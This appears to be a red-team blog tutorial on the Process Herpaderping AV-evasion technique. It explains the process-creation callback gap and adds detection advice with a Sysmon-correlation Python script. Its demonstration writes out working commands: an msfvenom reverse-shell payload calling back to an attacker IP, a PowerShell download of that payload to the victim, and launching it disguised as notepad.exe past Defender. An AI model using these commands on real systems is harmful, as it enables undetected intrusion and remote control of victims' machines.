Defense Evasion, Red Teaming

Process Herpaderping (Mitre:T1055)

Johnny Shaw demonstrated a defense evasion technique known as process herpaderping, in which an attacker injects malicious code into the mapped memory segment of a legitimate process before inspection of the created process actually begins. This helps an attacker bypass defenses and can also aid privilege escalation. While MITRE has not assigned a sub-ID to the technique, we deemed it appropriate to write the article under the process injection and defense evasion methods.

  • MITRE TACTIC: Defense Evasion (TA0005) and Privilege Escalation (TA0004)
  • MITRE Technique ID: Process Injection (T1055)

Table of Contents

  • Background
  • Process Herpaderping
  • Demonstration
  • Detection
  • Conclusion

Background

Security products register a Windows kernel callback, PsSetCreateProcessNotifyRoutineEx, to take action when a new process is mapped into memory and to determine whether the process should be allowed to execute (whether it is safe or not).

However, the kernel only invokes this callback, and thus the actual AV inspection, when the first thread of the respective process starts, not when the process object is created.

This creates a window of opportunity for an attacker to create and map a process, then change the file's contents on disk, and only thereafter create the initial thread.

Process Herpaderping

Herpaderping is English slang for a person who often becomes the target of ridicule due to their obliviousness. Johnny Shaw developed a technique called Process Herpaderping that modifies the contents of a file after mapping it in memory but before initiating the first thread, in order to evade anti-virus and other defense mechanisms. The AV cannot correctly determine whether to continue or stop execution, since the file behind the process has now changed. The original write-up, which is very clearly written, can be found here.

Steps followed are:

  • Create a target file (a benign file like cmd.exe) and keep the file handle open.
  • Map the file as an image section
    • NtCreateSection with the SEC_IMAGE flag set
  • Create the process object using the section handle
    • NtCreateProcessEx
  • Copy our payload and then, using the previously opened file handle, obscure the payload on disk.
  • Create the initial thread in the process
    • NtCreateThreadEx

At this point, the kernel will trigger the process creation callback (PsSetCreateProcessNotifyRoutineEx), and the contents on disk will not match what was mapped. Inspection of the file at this point will result in incorrect attribution.

  • Close the handle so that execution can begin properly
    • IRP_MJ_CLEANUP

Since the contents of what is actually being executed are now hidden, inspection at this point again results in incorrect attribution.

Demonstration

The official source code can be downloaded from here. All the submodules have to be included as well, so use the following procedure to fetch the code with git.

git clone https://github.com/jxy-s/herpaderping.git
cd .\herpaderping
git submodule update --init --recursive

It can now be compiled for release using Visual Studio (I used VS 2022). I forked the repo and uploaded a compiled binary for your ease of access here. It can now be run from cmd to check that it's working.

Now, our payload can be executed using a simple command like this:

ProcessHerpaderping.exe payload_file target_file

The tool accepts a third option as well, but we won't use it right now. Let's create a payload first.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.89 LPORT=1234 -f exe > payload.exe

Now we can transfer the executable and payload to our victim.

powershell wget 192.168.0.89/payload.exe -O payload.exe

Once we have transferred the payload successfully, we can run the Process Herpaderping executable to launch our payload hidden under some other legitimate executable, such as notepad.exe.

ProcessHerpaderping.exe payload.exe notepad.exe

As you can see, we should now have received a reverse shell on port 1234 (as our payload specified). This indicates a successful herpaderp of our payload under notepad.exe.

Also, on the victim system, one can reaffirm that Defender is active and has not flagged our payload as malicious when it is run!

Upon inspecting this attack in Process Explorer on the victim system, suspicious child processes spawning from legitimate executables should raise suspicion. Here, cmd.exe is spawning from notepad.exe, an application that does not launch executables, indicating a process injection attack!

Detection

  • AV vendors can update their signatures to detect the use of known APIs and paths such as NtCreateProcessEx and IRP_MJ_CLEANUP, and then conduct further behavioural analysis to block process injection at runtime.
  • Use PsSetCreateThreadNotifyRoutineEx instead of PsSetCreateProcessNotifyRoutineEx, as the former calls back at the time of thread insertion rather than when the thread begins executing.
  • Sysmon, from the Sysinternals suite, can detect process tampering. Download it here.
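The two detection signals the article points at (Sysmon's process tampering event, and a benign application such as notepad.exe spawning cmd.exe as seen in Process Explorer) can be correlated with a few lines of Python. The script below is an added example and is not part of the original article or of the herpaderping project. It parses Sysmon events exported as XML, flags Event ID 25 (ProcessTampering) records whose Type is "Image is replaced", flags Event ID 1 (ProcessCreate) records where a parent from a tunable no-child list launches a shell, and joins the two on the parent PID. The event IDs and field names follow the Sysmon event schema; the sample events, hostnames, GUIDs, PIDs and paths are constructed for the example, and the NO_CHILD_PARENTS and SHELLS lists are assumptions to be tuned per environment.

```python
"""Correlate Sysmon ProcessTampering (ID 25) with odd parent/child pairs (ID 1).
Added example for this article; event shapes follow Sysmon's XML schema,
sample data below is constructed."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumption: parents that have no legitimate reason to launch other executables.
NO_CHILD_PARENTS = {"notepad.exe", "calc.exe"}
# Assumption: children whose appearance under such a parent is most suspicious.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample: one tampering event, one suspicious spawn, one benign spawn.
SAMPLE_EVENTS = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>25</EventID><Computer>WIN10-VICTIM</Computer></System>
 <EventData>
  <Data Name="UtcTime">2023-01-01 10:00:00.000</Data>
  <Data Name="ProcessGuid">{00000000-0000-0000-0000-000000000001}</Data>
  <Data Name="ProcessId">4242</Data>
  <Data Name="Image">C:\Users\victim\Desktop\notepad.exe</Data>
  <Data Name="Type">Image is replaced</Data>
  <Data Name="User">WIN10-VICTIM\victim</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>1</EventID><Computer>WIN10-VICTIM</Computer></System>
 <EventData>
  <Data Name="UtcTime">2023-01-01 10:00:01.000</Data>
  <Data Name="ProcessId">4300</Data>
  <Data Name="Image">C:\Windows\System32\cmd.exe</Data>
  <Data Name="ParentProcessId">4242</Data>
  <Data Name="ParentImage">C:\Users\victim\Desktop\notepad.exe</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>1</EventID><Computer>WIN10-VICTIM</Computer></System>
 <EventData>
  <Data Name="UtcTime">2023-01-01 10:00:02.000</Data>
  <Data Name="ProcessId">4400</Data>
  <Data Name="Image">C:\Windows\System32\cmd.exe</Data>
  <Data Name="ParentProcessId">1000</Data>
  <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
 </EventData>
</Event>
</Events>"""


def _event_data(event):
    """Flatten <EventData><Data Name=...> children into a dict."""
    data = event.find("e:EventData", NS)
    return {d.get("Name"): (d.text or "") for d in data.findall("e:Data", NS)}


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(xml_text):
    """Return a list of (event_id, fields) tuples from exported Sysmon XML."""
    root = ET.fromstring(xml_text)
    return [(int(ev.find("e:System/e:EventID", NS).text), _event_data(ev))
            for ev in root.findall("e:Event", NS)]


def find_tampered_images(events):
    """Event ID 25 with Type 'Image is replaced' -> [(pid, image)]."""
    return [(int(d["ProcessId"]), d["Image"]) for eid, d in events
            if eid == 25 and d.get("Type") == "Image is replaced"]


def find_suspicious_children(events):
    """Event ID 1 where a no-child parent spawns a shell -> [(ppid, parent, pid, child)]."""
    hits = []
    for eid, d in events:
        if eid != 1:
            continue
        parent, child = _basename(d["ParentImage"]), _basename(d["Image"])
        if parent in NO_CHILD_PARENTS and child in SHELLS:
            hits.append((int(d["ParentProcessId"]), parent, int(d["ProcessId"]), child))
    return hits


def correlate(events):
    """Join both signals on the parent PID; a tampered image that then spawns a
    shell is the strongest indicator. Returns one alert dict per suspicious spawn."""
    tampered = {pid for pid, _ in find_tampered_images(events)}
    return [{"parent_pid": ppid, "parent": parent, "child_pid": pid, "child": child,
             "parent_image_tampered": ppid in tampered}
            for ppid, parent, pid, child in find_suspicious_children(events)]


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

In practice the XML would come from `wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml` or an exported .evtx; the benign explorer.exe spawn in the sample is there to show the parent/child rule does not fire on ordinary activity, and the ID 25 join is what lifts a single odd spawn into a high-confidence alert.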

Conclusion

The article discusses a defense evasion technique called Process Herpaderping, which obscures the true intent of a process by modifying the content on disk after mapping the image but before it starts executing. This confuses security products like Defender and leads to incorrect attribution; yet the payload executes nevertheless. A short demonstration also showcases it as a PoC. Hope you liked the article. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here